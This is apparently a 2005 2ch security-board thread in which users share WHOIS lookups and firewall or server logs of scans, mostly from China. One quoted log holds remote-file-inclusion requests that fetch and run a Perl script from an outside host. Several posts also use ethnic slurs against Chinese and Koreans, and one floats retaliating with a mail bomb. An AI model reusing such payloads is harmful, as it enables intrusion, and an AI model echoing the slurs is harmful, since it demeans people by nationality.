�IPアドレス��61.121.35.37� �ホスト名��ntfkok043037.fkok.nt.adsl.ppp.infoweb.ne.jp� Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.121.0.0/18 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) m. [管理者連絡窓口] KH071JP n. [技術連絡担当者] KN6902JP n. [技術連絡担当者] TK13654JP p. [ネームサーバ] ns1.hyper.web.ad.jp p. [ネームサーバ] ns3.hyper.web.ad.jp [割当年月日] 2000/12/12 [返却年月日] [最終更新] 2003/11/07 11:47:32(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 61.121.0.0/17
�IPアドレス��61.121.54.109� �ホスト名��nttyma014109.tyma.nt.ftth.ppp.infoweb.ne.jp� Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.121.0.0/18 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) m. [管理者連絡窓口] KH071JP n. [技術連絡担当者] KN6902JP n. [技術連絡担当者] TK13654JP p. [ネームサーバ] ns1.hyper.web.ad.jp p. [ネームサーバ] ns3.hyper.web.ad.jp [割当年月日] 2000/12/12 [返却年月日] [最終更新] 2003/11/07 11:47:32(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 61.121.0.0/17 下位情報 ---------- 該当するデータがありません。
[20:24:13] <222.208.168.142> (200,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/www.search591.com/prx1.php また中国か・・・多いな・・・
106 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 16:29:09
IPアドレス 58.87.242.56
107 :
名無しさん@お腹いっぱい。 :2005/11/24(木) 16:32:48
IPアドレス 61.118.154.45 もうさっきから一時間以上来てるこれで20回目だよ uzeeeeeeeeeeeeeeeeeeeeee
108 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 09:25:48
inetnum: 202.101.177.128 - 202.101.177.255
netname: CHINANET-ZJ-HU
country: CN
descr: CHINANET-ZJ Huzhou node network
descr: Zhejiang Telecom
admin-c: CZ4-AP
tech-c: CH119-AP
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20050429
mnt-by: MAINT-CHINANET-ZJ
mnt-lower: MAINT-CN-CHINANET-ZJ-HU
source: APNIC
2005/11/22(20:40:52) W-SV ns2.e-karnet.net(202.122.19.5) [80] 404 0 "GET /cacti/graph_image.php HTTP/1.1" ( ) 2005/11/24(03:30:05) W-SV 211.42.90.126 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy ) 2005/11/24(03:30:11) W-SV 211.42.90.126 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy ) 2005/11/24(03:30:17) W-SV 211.42.90.126 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy ) 2005/11/24(03:30:23) W-SV 211.42.90.126 [80] 404 0 "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy ) 2005/11/24(03:30:29) W-SV 211.42.90.126 [80] 404 0 "GET /cgi-bin/ikonboard/ikonboard.cgi?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
IPアドレス 222.100.185.13 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) またかの国か。
112 :
名無しさん@お腹いっぱい。 :2005/11/25(金) 17:04:17
<ニダー>
113 :
蟇朱 :2005/11/25(金) 17:20:05
DoCoMo/2.0SH901iC(c100;TB;W30H15) proxy360.docomo.ne.jp 210.136.161.74 DoCoMo/2.0SH901iC(c100;TB;W30H15)
114 :
蟇朱 :2005/11/25(金) 17:20:55
DoCoMo/2.0SH901iC(c100;TB;W30H15) proxy360.docomo.ne.jp 210.136.161.74 DoCoMo/2.0SH901iC(c100;TB;W30H15)
115 :
蟇朱 :2005/11/25(金) 17:21:28
DoCoMo/2.0SH901iC(c100;TB;W30H15) proxy360.docomo.ne.jp 210.136.161.74 DoCoMo/2.0SH901iC(c100;TB;W30H15)
116 :
名無しさん@お腹いっぱい。 :2005/11/26(土) 07:14:20
222.158.3.57
>>107 61.118.154.45 のホスト名は p4045-ipbf10sapodori.hokkaido.ocn.ne.jp です。
IPアドレス 80.23.33.194 ホスト名 host194-33.pool8023.interbusiness.it IPアドレス 割当国 ※ イタリア (IT) 80番ポートに何用じゃ氏ね
IPアドレス 220.105.156.41 ホスト名 p2041-ipbf06kyoto.kyoto.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 京都府 市外局番 -- 接続回線 光
120 :
名無しさん@お腹いっぱい。 :2005/11/26(土) 16:44:44
ホスト名winkだった俺と同じケーブルTVの奴かよw
漏れも先ほど、同じプロバイダの香具師の狙われました。同郷だし、やだなぁ。
achrsm003078.adsl.ppp.infoweb.ne.jp 219.116.60.78
[16:28:15] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:17] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:18] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:19] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:21] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:23] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:26] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:28] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:29] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:31] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:35] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:36] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - [16:28:37] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - - (*゚∀゚) 今度はイタリアかよ
IPアドレス 221.117.215.132 ホスト名 221x117x215x132.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道
すみません。頻度が多いのですが晒すこともできなくて困ってます。 169.254.31.224 なんですが、無理は承知でお願いします。
126 :
名無しさん@お腹いっぱい。 :2005/11/28(月) 01:50:01
219.98.210.62 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.98.192.0/19 b. [ネットワーク名] SO-NET f. [組織名] SO-Net サービス g. [Organization] SO-Net Service m. [管理者連絡窓口] MK2734JP n. [技術連絡担当者] SW314JP n. [技術連絡担当者] YO078JP p. [ネームサーバ] dnss3.so-net.ne.jp p. [ネームサーバ] dnss4.so-net.ne.jp p. [ネームサーバ] dnss5.so-net.ne.jp p. [ネームサーバ] dnss6.so-net.ne.jp p. [ネームサーバ] dnss7.so-net.ne.jp [割当年月日] 2002/04/12 [最終更新] 2004/10/13 15:36:55(JST) 上位情報 ---------- ソニーコミュニケーションネットワーク株式会社 (Sony Communication Network Corporation) [割り振り] 219.98.0.0/16
串使って不正アクセスすると、そのまま串の情報が向こうに行くのか? ダイヤルアップなんで、不正アクセスの脅威なんて知らない俺ガイル。
串は「刺す」が妥当だったか・・・。
何だかいけない事を聞いたかもしれない・・・答えは書かないでくれ。
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.224.160.0/22 b. [ネットワーク名] SAKURA-NET f. [組織名] さくらインターネット株式会社 g. [Organization] SAKURA Internet Inc. m. [管理者連絡窓口] KT749JP n. [技術連絡担当者] HS821JP n. [技術連絡担当者] KW419JP p. [ネームサーバ] ns1.dns.ne.jp p. [ネームサーバ] ns2.dns.ne.jp [割当年月日] 1998/06/18 [最終更新] 2000/12/14 16:53:28(JST) 上位情報 ---------- さくらインターネット株式会社 (SAKURA Internet Inc.) [割り振り] 210.224.160.0/22 下位情報 ---------- 該当するデータがありません。 これ何?
見てのとおり
221.184.25.225 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 221.184.0.0/19 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network m. [管理者連絡窓口] AY1361JP n. [技術連絡担当者] MO081JP n. [技術連絡担当者] KK551JP n. [技術連絡担当者] IM657JP p. [ネームサーバ] ns-os001.ocn.ad.jp p. [ネームサーバ] pns.ocn.ad.jp [割当年月日] 2003/08/05 [返却年月日] [最終更新] 2003/08/05 13:52:08(JST) 上位情報 ---------- エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION) [割り振り] 221.184.0.0/13
206.223.151.225 久しぶりにノートン先生がピコピコしてた・・・ 何なのよ一体
210.232.49.3 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.232.49.0-210.232.51.255 b. [ネットワーク名] KJPS-NET f. [組織名] 株式会社キンデン g. [Organization] KINDEN Co.,LTD. m. [管理者連絡窓口] YK7511JP n. [技術連絡担当者] YK7511JP p. [ネームサーバ] ns1.kjps.net p. [ネームサーバ] ns2.kjps.net [割当年月日] 2003/07/11 [最終更新] 2003/07/14 10:32:02(JST) 上位情報 ---------- エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION) [割り振り] 210.232.0.0/16
136 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 13:41:31
210.131.38.50 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.131.32.0/19 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) m. [管理者連絡窓口] KH071JP n. [技術連絡担当者] KN6902JP n. [技術連絡担当者] TK13654JP p. [ネームサーバ] ns1.hyper.web.ad.jp p. [ネームサーバ] ns3.hyper.web.ad.jp [割当年月日] 1998/08/21 [最終更新] 2003/11/06 11:08:04(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 210.131.0.0/18
137 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 15:38:50
206.223.152.50 遠路はるばるアメリカはネヴァダからいらっしゃーい
138 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 16:55:15
206.223.151.225
遠路はるばるアメリカはエヴァダからいr・・・
>>137 おまいもですか!こいつしつこくないですか?3回くらいアクセスあったorz
アンカー間違えましたスマソ;
[19:14:06] <222.92.249.99> (178,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/verify.qq.com/getimage また中国か('A`)
>>137-138 それNISの誤作動。
なんでセキュ板にその対処法のスレが立ってないか不思議だ。
>>141 問題の単純な呪文でググったら、グーグルも”侵入の疑いにより”接続を遮断されたwww
今は、シグネ茶を単一除外にしてるずら。
143 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 09:39:14
218.120.204.34 ヤフーBB管理者にログ提出の上、 報告の内容次第では告訴いたします。
[03:10:50] <211.53.110.11> (25,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /sumthin 韓国タソ(*´Д`)ハァハァ
145 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 23:10:01
p6130-ipad06otsu.shiga.ocn.ne.jp この人なんだよwwwいやしつこすぎるんだが・・有名人?
146 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 00:02:28
とりあえず法律違反だよなこれ
147 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 02:58:42
inetnum: 203.162.0.0 - 203.162.255.255
netname: VNPT-VNNIC-VN
country: VN
descr: Vietnam Posts and Telecommunications (VNPT)
descr: 23 Phan Chu Trinh st., Hanoi capital, Vietnam
admin-c: NXC1-AP
tech-c: KNH1-AP
status: ALLOCATED PORTABLE
changed:
[email protected] 20041011
mnt-by: MAINT-VN-VNNIC
mnt-lower: MAINT-VN-VNPT
source: APNIC
↑これなに??
149 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 04:24:19
つーかヒントぐらいくれ
Dec 1 06:42:55 *** sshd[15668]: Did not receive identification string from 133.60.107.2 Dec 1 06:45:47 *** sshd[15669]: input_userauth_request: illegal user lpd Dec 1 06:45:47 *** sshd[15669]: Failed password for illegal user lpd from 133.60.107.2 port 60934 ssh2 Dec 1 06:45:47 *** sshd[15669]: Received disconnect from 133.60.107.2: 11: Bye Bye (略) Dec 1 06:57:01 *** sshd[16521]: input_userauth_request: illegal user muonline Dec 1 06:57:01 *** sshd[16521]: Failed password for illegal user muonline from 133.60.107.2 port 37684 ssh2 Dec 1 06:57:01 *** sshd[16521]: Received disconnect from 133.60.107.2: 11: Bye Bye ここのところ ssh のパスワード探しがまた増えてきたなぁ。 殆どが中韓だけど、珍しく国内からのお客さん。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 133.60.0.0/16 b. [ネットワーク名] HIROIN f. [組織名] 弘前大学 g. [Organization] Hirosaki University m. [管理者連絡窓口] MF3045JP n. [技術連絡担当者] HM006JP n. [技術連絡担当者] KS7358JP p. [ネームサーバ] dash.cc.hirosaki-u.ac.jp p. [ネームサーバ] moya.gw.hirosaki-u.ac.jp p. [ネームサーバ] slash.cc.hirosaki-u.ac.jp [割当年月日] [返却年月日] [最終更新] 2005/03/08 18:02:02(JST)
>150 踏み台の可能性も高いんでね?
152 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 17:39:39
IP:219.125.148.211 HOST:wbcc2s10.ezweb.ne.jp Agent:KDDI-CA31 UP.Browser/6.2.0.7.3.129 (GUI) MMP/2.0 UTN:05001012917204_ab.ezweb.ne.jp こいつのメールがスパム、個人的にww
61.125.231.39 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.125.192.0/18 b. [ネットワーク名] ASAHI-NET f. [組織名] 朝日ネット 書いてる途中に、またいらっしゃいました 219.15.232.108 inetnum: 219.0.0.0 - 219.63.255.255 netname: BBTECH descr: SOFTBANK BB CORP descr: Nation wide network in Japan
154 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 20:16:43
202.98.123.179
メールボムでも送ってやろうかと思ったらぺーじが表示できませんだってorz
ページ? 勘違いしてないか?
(spamメールが来たから)メールボムでも送ってやろうかと思ったら(リンク先の)ぺーじが表示できませんだってorz こんなところか? だったらすれ違いだな。
158 :
157 :2005/12/04(日) 21:32:58
スレ違いってより板違いか。
210.175.58.25 [ネットワーク名]KBN-NET [組織名]香川テレビ放送網株式会社 [Organization]kagawa T.V Broadcast Network Co.,Ltd [管理者連絡窓口]HM5639JP [技術連絡担当者]HM5639JP [ネームサーバ]dns3.odn.ne.jp [ネームサーバ]ns1.kbn.ne.jp [ネームサーバ]ns2.kbn.ne.jp [割当年月日]2002/06/12 [返却年月日] [最終更新]2002/06/24 10:34:23(JST) 一瞬ケーブルか?と思いきや・・・
2005/12/01〜12/04まで不正アクセスの類が一つもなかった。(/GETとかもない) 珍しいこともあるものだ。
161 :
名無しさん@お腹いっぱい。 :2005/12/06(火) 14:32:06
IPアドレス 222.96.154.156 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 特定アジアは氏ね
210.235.234.95 Non-authoritative answer: 95.234.235.210.in-addr.arpa name = dr95.opt2.point.ne.jp. Authoritative answers can be found from: 234.235.210.in-addr.arpa nameserver = ns.dti.ad.jp. 234.235.210.in-addr.arpa nameserver = ns2.dti.ad.jp. dr95.opt2.point.ne.jp
163 :
名無しさん@お腹いっぱい。 :2005/12/06(火) 21:38:20
YahooBB219184048022.bbtec.net 屑だ
ノートン先生が怒ったんだが ↓ 侵入を検出して遮断しました。news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。 にちゃんが攻撃しかけてきた???
210.228.173.161 [IPネットワークアドレス] 210.228.173.0-210.228.176.255 [ネットワーク名]MOMOTAROUNET [組織名]Momoたろうインターネットクラブ(日本晃伸株式会社) [Organization]Momotarou Internet Club (NIHONKOUSHIN Co.) [管理者連絡窓口]ST182JP [技術連絡担当者]ST182JP [ネームサーバ]ns1.mmtr.or.jp [ネームサーバ]ns2.mmtr.or.jp [割当年月日]1998/12/08 [返却年月日] [最終更新]2003/04/10 14:57:05(JST) おそらく踏み台にされているな。 でも、三日に一回のペースでサーバー障害を起こしている プロバイダって・・・
>>164 串かどうか2chが確認するためにポートスキャンしてきただけ。
167 :
名無しさん@お腹いっぱい。 :2005/12/07(水) 21:58:07
IPアドレス 59.128.182.206 結構前からチクチクやってくる。 こういうのはISPに苦情出してもいいんだろうか?
168 :
名無しさん@お腹いっぱい。 :2005/12/08(木) 15:46:01
218.7.208.64 - 218.7.208.71
netname: HEGANG-TEACHER-COLLEGE
descr: He gang city teacher college
country: CN
admin-c: BG63-AP
tech-c: BG63-AP
changed:
[email protected] 20030610
これって昔の日本の師範学校みたいな所からのからの攻撃じゃないのw
ちょwwwwwwwwwwwwwwwwwwww
学校の先生の卵がクラッキングとはw
169 :
名無しさん@お腹いっぱい。 :2005/12/08(木) 20:56:39
inetnum: 220.184.0.0 - 220.184.255.255
netname: CHINANET-ZJ-HZ
country: CN
descr: CHINANET-ZJ Hangzhou node network
descr: Zhejiang Telecom
admin-c: CZ4-AP
tech-c: CH122-AP
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20050429
170 :
名無しさん@お腹いっぱい。 :2005/12/08(木) 21:42:11
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.151.216.0/22 b. [ネットワーク名] HIMEJICATV f. [組織名] 姫路ケーブルテレビ株式会社 g. [Organization] HIMEJI CABLE TELEVISION CORPORATION m. [管理者連絡窓口] SN2184JP n. [技術連絡担当者] SN2184JP p. [ネームサーバ] ns05.mesh.ad.jp p. [ネームサーバ] ns1.winknet.ne.jp p. [ネームサーバ] ns2.winknet.ne.jp [割当年月日] 2002/09/26
171 :
名無しさん@お腹いっぱい。 :2005/12/08(木) 21:47:40
OrgName: Internet Assigned Numbers Authority OrgID: IANA Address: 4676 Admiralty Way, Suite 330 City: Marina del Rey StateProv: CA PostalCode: 90292-6695 Country: US 物凄い攻撃受けてるんだけど
172 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 01:42:59
>>171 ↑そこ、昔私のPCを執拗に攻撃してきた奴だと思う。
プロバイダーA○L使ってるとそこから執拗に攻撃受けるよ・・・・・
173 :
晒し上げ :2005/12/09(金) 03:18:22
同じぷららの全国のAPから猛烈にアタック食らうんだが。
175 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 15:12:07
OrgName: Internet Assigned Numbers Authority OrgID: IANA Address: 4676 Admiralty Way, Suite 330 City: Marina del Rey StateProv: CA PostalCode: 90292-6695 Country: US NetRange: 224.0.0.0 - 239.255.255.255 CIDR: 224.0.0.0/4 NetName: MCAST-NET NetHandle: NET-224-0-0-0-1
177 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 20:33:37
あなたが検索されたアドレス[ 220.97.196.148 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.97.0.0/16 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network m. [管理者連絡窓口] AY1361JP n. [技術連絡担当者] MO081JP n. [技術連絡担当者] KK551JP n. [技術連絡担当者] IM657JP p. [ネームサーバ] ns-kg001.ocn.ad.jp p. [ネームサーバ] ns-kn001.ocn.ad.jp [割当年月日] 2002/09/12 [最終更新] 2002/09/12 16:53:08(JST) 上位情報 ---------- エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION) [割り振り] 220.96.0.0/14
178 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 21:18:10
softbank219184048022.bbtec.net 糞
179 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 21:29:07
219.184.48.22
TCP1025 CN うざい
182 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 23:17:21
IPアドレス 210.154.213.213 ホスト名 p2213-ipbf201kanazawa.ishikawa.ocn.ne.jp IPネットワークアドレス 210.154.192.0/18 ネットワーク名 OCN 組織名 オープンコンピュータネットワーク [Organization]Open Computer Network [管理者連絡窓口]AY1361JP [技術連絡担当者]MO081JP [技術連絡担当者]KK551JP [技術連絡担当者]IM657JP [割当年月日]1997/08/07 [返却年月日] [最終更新]2002/01/28 10:48:43(JST) 三日以上昼夜を問わず突っ込んでくる。 此処まで異常なアクセス要求を連日出していても 管理者は気付かないのか? IPは変われども、数ヶ月前からウィルスにやられた 同じヤツだと思うのだが・・・ マジで苦情出そうかなあ・・・
184 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 03:05:30
最近 中国からばっか。なんとかなんない?
inetnum: 219.128.0.0 - 219.153.255.255
netname: CHINANET-CN
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: CH93-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET
status: ALLOCATED PORTABLE
changed:
[email protected] 20050120
source: APNIC
inetnum: 219.128.0.0 - 219.137.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20020424
changed:
[email protected] 20041207
source: APNIC
% APNIC database, last updated 20050925 23:00:32
inetnum: 218.13.0.0 - 218.20.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: APNIC-HM
mnt-by: MAINT-CHINANET
status: ALLOCATED PORTABLE
changed:
[email protected] 20050511
source: APNIC
inetnum: 218.13.0.0 - 218.18.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20010528
changed:
[email protected] 20041207
source: APNIC
186 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 13:05:16
OrgName: Internet Assigned Numbers Authority OrgID: IANA Address: 4676 Admiralty Way, Suite 330 City: Marina del Rey StateProv: CA PostalCode: 90292-6695 Country: US NetRange: 224.0.0.0 - 239.255.255.255 CIDR: 224.0.0.0/4 NetName: MCAST-NET NetHandle: NET-224-0-0-0-1 Parent: NetType: IANA Special Use NameServer: FLAG.EP.NET NameServer: STRUL.STUPI.SE NameServer: NS.ISI.EDU NameServer: NIC.NEAR.NET Comment: This block is reserved for special purposes. Comment: Please see RFC 3171 for additional information. Comment: RegDate: 1991-05-22 Updated: 2002-09-16
187 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 15:26:33
inetnum: 220.189.228.144 - 220.189.228.151
netname: SHANGYU-XIAOYUE-HIGH-SCHOOL
country: CN → (中国)
descr: Shangyu Xiaoyue High School
status: ASSIGNED NON-PORTABLE
changed:
[email protected] 20050429
role: CHINANET-ZJ Shaoxing
address: No.9 Sima Road,Shaoxing,Zhejiang.312000
country: CN → (中国)
phone: +86-575-5136199
fax-no: +86-575-5114449
admin-c: CH109-AP
tech-c: CH109-AP
nic-hdl: CS64-AP
mnt-by: MAINT-CHINANET-ZJ
changed:
[email protected] 20031204
source: APNIC
person: Huafu Zhe
nic-hdl: HZ395-AP
e-mail:
[email protected] address: Xiaoyue High School,Shangyu,Shaoxing,Zhejiang.Postcode:312300
phone: +86-575-2117535
country: CN → (中国)
changed:
[email protected] 20050421
mnt-by: MAINT-CN-CHINANET-ZJ-SX
source: APNIC
今日は中国からハッキングが多いんだがなぜだ
inetnum: 203.175.192.0 - 203.175.255.255
netname: NBIP
descr: NBIP CNC(Ningbo)info-Port co.,Ltd
country: CN
admin-c: CJ118-AP
tech-c: CJ118-AP
status: ALLOCATED PORTABLE
changed:
[email protected] 20021128
mnt-by: APNIC-HM
mnt-lower: MAINT-CN-NBIP
source: APNIC
189 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 15:38:13
ここ2,3日シナから多い 219.234.184.221 202.98.201.75 218.64.68.56 …
190 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 15:39:43
191 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 15:49:18
role: CHINANET HUNAN
address: No.1 TuanJie road,ChangSha,Hunan 410005
country: CN → (中国)
phone: +86 731 4792092
fax-no: +86 731 4792007
e-mail:
[email protected] trouble: send spam reports to
[email protected] trouble: and abuse reports to
[email protected] trouble: Please include detailed information and
trouble: times in UTC
admin-c: CH632-AP
tech-c: CS499-AP
nic-hdl: CH636-AP
mnt-by: MAINT-CHINANET-HN
changed:
[email protected] 20050816
source: APNIC
192 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 15:55:39
inetnum: 222.32.0.0 - 222.63.255.255
descr: CHINA RAILWAY TELECOMMUNICATIONS
netname: CRTC
person: LV QIANG
nic-hdl: LQ112-AP
e-mail:
[email protected] address: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.China
phone: +86-10-51892106
fax-no: +86-10-51890674
country: CN → (中国)
changed:
[email protected] 20050823
mnt-by: MAINT-CNNIC-AP
source: APNIC
193 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 17:13:20
inetnum: 61.157.0.0 - 61.157.255.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: Data Communication Division
descr: China Telecom
country: シナ
admin-c: CH93-AP
tech-c: XS16-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-SC
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20000701
changed:
[email protected] 20040927
changed:
[email protected] 20041126
source: APNIC
% APNIC database, last updated 20050925 23:00:32
194 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 17:16:06
inetnum: 219.234.184.0 - 219.234.184.255
netname: YI-GUO-ZAI-XIAN
country: シナ
descr: BEIJING YI-GUO-ZAI-XIAN CO.LTD
descr: CO.LTD
admin-c: PP40-AP
tech-c: PP40-AP
status: ASSIGNED NON-PORTABLE
changed:
[email protected] 20030211
mnt-by: MAINT-CNNIC-AP
source: APNIC
やたらと中国から攻撃される 何かあったの?
中国方面からUDP:1026...1030あたりを激しくハァハァされてる。 同じIPから何度も何度も。
中国多発。 今のノートンはピコピコじゃないからうざい。
239.255.255.250 米の国か しつこいな
・・・と思ったら違った!!
200 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 21:42:46
中国ウザすぎ。
NTV板に入ろうとすると206.223.150.96からHTTP MSIE JaveScript OnLoad RteCodeExec で攻撃されるんだがこれってウイルスが俺のパソコンに入っているの?
今日中国にIP別々で10回もハッキングされているんだけどなんかあったのか
inetnum: 218.87.0.0 - 218.87.255.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
source: APNIC
% APNIC database, last updated 20050925 23:00:32
文字を書き込んでいる途中にも218.87.65.83からもハッキングされた
中国から攻撃を受けているのが俺だけじゃなくてちょっと安心
IPアドレス 222.2.147.66 ホスト名 ZG147066.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 xDSL
205 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 23:34:09
今は数分おきに攻撃があるぞw 基地外中国人は何がしたいんだ?
ぜんぜん来ないよ・・・ さびしいよ・・・
昨日からずーっと中国から1025攻撃されてる キリがない
パールハーバーのノリかな?
最近はK察も不正アクセスに対してアナウンスするようになったのね
警察庁は9日、主に中国の不特定のIPアドレスを発信元とする、
TCP 1025番ポートに対するアクセスの増加を検知したとして、注意喚起を行なった。
TCP 1025番ポートへのアクセスは8日の21時頃から急増し、9日現在もアクセスが続いている。
アクセス増加の原因については現在のところ不明だが、このポートはWindowsのRPC DCOMなどで利用されるもので、
大規模なスキャンの可能性があるという。警察庁では、修正プログラムの適用を行なうなど、
使用しているコンピュータのセキュリティの再確認を推奨している。
http://internet.watch.impress.co.jp/cda/news/2005/12/09/10174.html
今、中国から来ました 218.64.69.85
数分おきにチャイナから攻撃されてウザッたいなぁ
そうえいば2CHにセキュリティ板あったなあと思って来てみたら・・・。 みんなここ最近中華から攻撃されてるのか。俺も数分おきくらいにノートン先生が反応する
いや〜 もうかれこれ40回は攻撃されちゃってるよぅ、チャイナから なに今度はネットで反日活動?活動と言うか攻撃?
5EX
チャイナギャルに攻撃されたい
>>209 それ見つけてルータのログ見たら1025アクセスがさっそく見つかってワロタ
>>209 俺も調べたら中国から
1025-1030のアクセスがあった。
218 :
名無しさん@お腹いっぱい。 :2005/12/11(日) 11:03:35
チョンやチャンコロのためにログ領域消費するのは無駄。つーか、ログが穢れる。 チョンとチャンコロはルールの最初で無条件に落としといて、回数だけカウント。
攻撃があるとかアクセスがあるとか、どうやってわかるの?
220 :
名無しさん@お腹いっぱい。 :2005/12/11(日) 16:17:04
